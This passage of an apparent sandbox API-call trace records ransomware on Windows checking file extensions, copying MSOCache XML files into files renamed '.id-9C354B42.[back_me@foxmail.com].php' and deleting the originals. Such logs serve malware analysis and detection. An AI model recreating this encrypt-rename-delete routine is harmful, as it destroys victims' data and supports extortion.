(lpString=".doc") returned 4 [0035.176] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString=".docx") returned 5 [0035.176] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.176] lstrlenW (lpString=".pdf") returned 4 [0035.176] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString=".xls") returned 4 [0035.177] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString=".xlsx") returned 5 [0035.177] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.177] lstrlenW (lpString=".ppt") returned 4 [0035.177] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.177] lstrlenW (lpString=".zip") returned 4 [0035.177] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.177] lstrlenW (lpString=".rar") returned 4 [0035.177] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString=".bz2") returned 4 [0035.177] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString=".7z") returned 3 [0035.177] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.177] lstrlenW (lpString=".dbf") returned 4 [0035.177] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.177] lstrlenW (lpString=".1cd") returned 4 [0035.177] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.177] lstrlenW (lpString=".jpg") returned 4 [0035.177] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.177] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.177] lstrlenW (lpString="Setup.xml") returned 9 [0035.177] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.178] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=5884) returned 1 [0035.178] CloseHandle (hObject=0x190) returned 1 [0035.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.178] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.178] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.178] GetLastError () returned 0x0 [0035.178] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x16fc, lpOverlapped=0x0) returned 1 [0035.180] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1700, lpOverlapped=0x0) returned 1 [0035.181] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.181] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.181] SetEndOfFile (hFile=0x19c) returned 1 [0035.181] CloseHandle (hObject=0x19c) returned 1 [0035.182] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.182] SetEndOfFile (hFile=0x190) returned 1 [0035.183] CloseHandle (hObject=0x190) returned 1 [0035.183] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.183] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.183] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.183] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.183] lstrlenW (lpString=".doc") returned 4 [0035.183] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.183] lstrlenW (lpString=".docx") returned 5 [0035.183] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.183] lstrlenW (lpString=".pdf") returned 4 [0035.183] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString=".xls") returned 4 [0035.184] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString=".xlsx") returned 5 [0035.184] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.184] lstrlenW (lpString=".ppt") returned 4 [0035.184] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString=".zip") returned 4 [0035.184] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.184] lstrlenW (lpString=".rar") returned 4 [0035.184] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString=".bz2") returned 4 [0035.184] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString=".7z") returned 3 [0035.184] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString=".dbf") returned 4 [0035.184] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString=".1cd") returned 4 [0035.184] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString=".jpg") returned 4 [0035.184] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.184] lstrlenW (lpString=".doc") returned 4 [0035.184] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.184] lstrlenW (lpString=".docx") returned 5 [0035.184] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.184] lstrlenW (lpString=".pdf") returned 4 [0035.184] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString=".xls") returned 4 [0035.185] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString=".xlsx") returned 5 [0035.185] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.185] lstrlenW (lpString=".ppt") returned 4 [0035.185] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.185] lstrlenW (lpString=".zip") returned 4 [0035.185] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.185] lstrlenW (lpString=".rar") returned 4 [0035.185] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString=".bz2") returned 4 [0035.185] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString=".7z") returned 3 [0035.185] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.185] lstrlenW (lpString=".dbf") returned 4 [0035.185] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.185] lstrlenW (lpString=".1cd") returned 4 [0035.185] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.185] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.185] lstrlenW (lpString=".jpg") returned 4 [0035.185] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.185] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.185] lstrlenW (lpString="Office32MUI.xml") returned 15 [0035.185] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.186] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1383) returned 1 [0035.186] CloseHandle (hObject=0x190) returned 1 [0035.186] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 0x2020 [0035.186] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.187] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.187] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.187] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.187] GetLastError () returned 0x0 [0035.187] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x567, lpOverlapped=0x0) returned 1 [0035.438] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x570, lpOverlapped=0x0) returned 1 [0035.439] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.439] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0035.439] SetEndOfFile (hFile=0x19c) returned 1 [0035.439] CloseHandle (hObject=0x19c) returned 1 [0035.440] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.440] SetEndOfFile (hFile=0x190) returned 1 [0035.441] CloseHandle (hObject=0x190) returned 1 [0035.441] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.441] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1 [0035.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.441] lstrlenW (lpString=".doc") returned 4 [0035.441] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.441] lstrlenW (lpString=".docx") returned 5 [0035.441] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.441] lstrlenW (lpString=".pdf") returned 4 [0035.441] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.441] lstrlenW (lpString=".xls") returned 4 [0035.442] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString=".xlsx") returned 5 [0035.442] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.442] lstrlenW (lpString=".ppt") returned 4 [0035.442] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString=".zip") returned 4 [0035.442] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.442] lstrlenW (lpString=".rar") returned 4 [0035.442] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString=".bz2") returned 4 [0035.442] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString=".7z") returned 3 [0035.442] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString=".dbf") returned 4 [0035.442] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString=".1cd") returned 4 [0035.442] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString=".jpg") returned 4 [0035.442] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.442] lstrlenW (lpString=".doc") returned 4 [0035.442] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString=".docx") returned 5 [0035.442] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.442] lstrlenW (lpString=".pdf") returned 4 [0035.442] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.442] lstrlenW (lpString=".xls") returned 4 [0035.442] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString=".xlsx") returned 5 [0035.443] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.443] lstrlenW (lpString=".ppt") returned 4 [0035.443] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.443] lstrlenW (lpString=".zip") returned 4 [0035.443] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.443] lstrlenW (lpString=".rar") returned 4 [0035.443] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString=".bz2") returned 4 [0035.443] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString=".7z") returned 3 [0035.443] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.443] lstrlenW (lpString=".dbf") returned 4 [0035.443] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.443] lstrlenW (lpString=".1cd") returned 4 [0035.443] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.443] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0035.443] lstrlenW (lpString=".jpg") returned 4 [0035.443] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.443] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.443] lstrlenW (lpString="branding.xml") returned 12 [0035.443] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.288] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=596341) returned 1 [0036.288] CloseHandle (hObject=0x1c0) returned 1 [0036.288] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0036.288] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0036.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.288] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.288] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0036.288] GetLastError () returned 0x0 [0036.288] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x91975, lpOverlapped=0x0) returned 1 [0036.301] WriteFile (in: hFile=0x1ac, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0036.313] ReadFile (in: hFile=0x1c0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.313] WriteFile (in: hFile=0x1ac, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0036.313] SetEndOfFile (hFile=0x1ac) returned 1 [0036.314] CloseHandle (hObject=0x1ac) returned 1 [0036.477] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.478] SetEndOfFile (hFile=0x1c0) returned 1 [0036.592] CloseHandle (hObject=0x1c0) returned 1 [0036.592] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.592] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0036.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.592] lstrlenW (lpString=".doc") returned 4 [0036.592] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.592] lstrlenW (lpString=".docx") returned 5 [0036.592] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.592] lstrlenW (lpString=".pdf") returned 4 [0036.592] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.592] lstrlenW (lpString=".xls") returned 4 [0036.592] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.592] lstrlenW (lpString=".xlsx") returned 5 [0036.593] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.593] lstrlenW (lpString=".ppt") returned 4 [0036.593] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString=".zip") returned 4 [0036.593] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.593] lstrlenW (lpString=".rar") returned 4 [0036.593] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString=".bz2") returned 4 [0036.593] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString=".7z") returned 3 [0036.593] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString=".dbf") returned 4 [0036.593] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString=".1cd") returned 4 [0036.593] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString=".jpg") returned 4 [0036.593] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0036.593] lstrlenW (lpString=".doc") returned 4 [0036.593] lstrcmpiW (lpString1=".doc", 